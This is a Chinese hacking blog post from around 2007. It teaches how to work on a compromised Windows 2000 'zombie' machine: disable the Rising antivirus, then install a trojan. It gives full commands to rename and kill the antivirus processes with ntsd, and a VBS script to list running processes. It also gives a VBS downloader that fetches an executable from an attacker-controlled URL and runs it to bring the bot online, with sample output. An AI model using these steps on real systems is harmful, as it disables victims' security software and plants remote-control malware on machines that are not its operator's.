有问题请加入技术Q群: 36085817(DELPHI朋友)
 

时 间 记 忆
最 新 评 论
专 题 分 类
最 新 日 志
最 新 留 言
搜 索
用 户 登 录
友 情 连 接
博 客 信 息
 
[原创]2000肉鸡取得DOS shell以后杀掉瑞星的进程!
[ 2008-1-25 2:54:00 | By: roki ]
 
[原创]2000肉鸡取得DOS shell以后杀掉瑞星的进程!
洛奇 发表于 2007-3-13 10:36:00

溢出取得shell很多朋友都会,但是啊,常常有些肉鸡就是很郁闷,开着瑞星啊 之类的东西,让你传不了马过去......,这两天,我也是自己亲身摸索找到一个绝对好用的方法(2000系统下有效).

第一步:溢出取得 cmdshell (这个就不需要我去重复了吧?很多方法)


第二步:要找出当前瑞星的进程是哪个.在网上很少说道怎么在 DOS下查看进程的方法(总之我就很少找到,找到一个还不能用,气死了)

 

 

步骤脚本:

关瑞星防火墙之前 先重命名几个主要文件

cd C:\Program Files\Rising\Rav\
ren CCenter.exe CCenter.exe1
ren Rav.exe Rav.exe1
ren RavMon.exe RavMon.exe1
ren RavXP.exe RavXP.exe1
ren RavStub.exe RavStub.exe1
ren Ravmond.exe Ravmond.exe1
ren RavTask.exe RavTask.exe1


cd C:\Program Files\Rising\Rfw\
ren rfwsrv.exe rfwsrv.exe1
ren rfwmain.exe rfwmain.exe1

然后回到系统目录,创建查看线程的教本

cd C:\WINNT\system32

echo wscript.echo "PID ProcessName":for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ :wscript.echo ps.handle:wscript.echo ps.name:next >a.vbs


然后运行 
cscript a.vbs

找出正在运行的瑞星程序对应的PID 用下面命令杀进程(有多少进程杀多少,***表示运行中的进程PID)

ntsd -c q -p ***


杀完后 可以用 cscript a.vbs
确认一下,还有残留的要继续杀


接着 写入传木马教本

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://www.***.net/ma/m.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\winnt\system32\m.exe^",2 >d.vbs

执行它程序就会下载木马

cscript d.vbs

OK!回到提示符下 即可运行木马

M.EXE

------------------


把瑞星恢复

cd C:\Program Files\Rising\Rav\
ren CCenter.exe1 CCenter.exe
ren Rav.exe1 Rav.exe
ren RavMon.exe1 RavMon.exe
ren RavXP.exe1 RavXP.exe
ren RavStub.exe1 RavStub.exe
ren Ravmond.exe1 Ravmond.exe
ren RavTask.exe1 RavTask.exe


cd C:\Program Files\Rising\Rfw\
ren rfwsrv.exe1 rfwsrv.exe
ren rfwmain.exe1 rfwmain.exe



自己写了一个VBS 脚本.(前提是 肉鸡上 CSCRIPT能用,没被别的黑客删改掉,就绝对没问题的哦)

内容如下:
wscript.echo "PID ProcessName"
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
wscript.echo ps.handle
wscript.echo ps.name
next


-----------以下是实际操作把这些内容写进一个a.vbs文本里-------------------
C:\>echo wscript.echo "PID ProcessName" >a.vbs

C:\>echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>a.vbs

C:\>echo wscript.echo ps.handle >>a.vbs

C:\>echo wscript.echo ps.name >>a.vbs

C:\>echo next >>a.vbs

---------------以下操作通过执行 a.vbs 可以列出所有的活动进程以及 进程ID--------------------
C:\>cscript a.vbs


----------------------结果如下:---------------------------------------------------------------


D:\>cscript_ a.vbs
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

PID ProcessName
0
System Idle Process
8
System
176
smss.exe
200
csrss.exe
220
WINLOGON.EXE
248
SERVICES.EXE
260
LSASS.EXE
460
svchost.exe
488
CCenter.exe
504
RavMonD.exe
592
spoolsv.exe
640
rundll32.exe
668
svchost.exe
716
LLSSRV.EXE
768
RavStub.exe
860
PPPoEService.ex
888
ShadowService.e
904
stisvc.exe
952
TAPPSRV.exe
980
winmgmt.exe
992
svchost.exe
1004
inetinfo.exe
1236
explorer.exe
1328
dfssvc.exe
1376
RavTask.exe
1392
RavMon.exe
1428
VStart.exe
1484
internat.exe
1496
svchost.exe
1504
sqlmangr.exe
288
EnterNetFolder.
244
EnterNet.exe
1136
QQ.exe
1008
ACDSee.exe
2120
conime.exe
532
GMTBJQYFMUBIQXE
1712
IEXPLORE.EXE
2912
IEXPLORE.EXE
3076
H_Client.exe
5516
IEXPLORE.EXE
5752
EasyPanel.exe
6608
IEXPLORE.EXE
4816
editplus.exe
5688
isqlw.exe
7244
notepad.exe
6992
nc.exe
7372
nc.exe
7380
nc.exe
7240
notepad.exe
1772
CMD.EXE
7592
CMD.EXE
5872
notepad.exe
5824
taskmgr.exe
7576
notepad.exe



以上看到了么?就是一个进程ID 接着一个进程名称,从上面可以看到我的瑞星进程ID是504

第三步:杀掉瑞星进程 ,好了 要杀掉这个该死的瑞星,谁让他档我上传网马呢?嘿嘿

用命令 c:/>ntsd -c q -p 504  

过一会 ,你发现 瑞星已经被我们关掉拉....不信你可以重新执行C:\>cscript a.vbs
查看一下....嘿嘿


第四步:传小马过去咯,方法多种多样.......流行的做法是 tftp 或者 ftp........没有瑞星的感觉真好....嘿嘿......如果这两种都不行,你就试试我这种.....哈哈哈

脚本下载法:



上传木马到主机上的脚本


C:\>echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs

C:\>echo xPost.Open "GET","http://你的木马网址/你的木马.exe",0 >>webdown.vbs

C:\>echo xPost.Send() >>webdown.vbs

C:\>echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs

C:\>echo sGet.Mode = 3 >>webdown.vbs

C:\>echo sGet.Type = 1 >>webdown.vbs

C:\>echo sGet.Open() >>webdown.vbs

C:\>echo sGet.Write(xPost.responseBody) >>webdown.vbs

C:\>echo sGet.SaveToFile "muma.exe",2 >>webdown.vbs

C:\>cscript webdown.vbs
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。


C:\>


这个时候 你的木马已经被下载到 C盘下了 ,名字就是 muma.exe

赶紧执行他吧 一会,就看到肉鸡上线咯.....

 
有问题请 加入 技术Q群 :36085817(DELPHI朋友)

发表评论:

    大名:
    密码:
    主页:
    标题:
Powered by Oblog.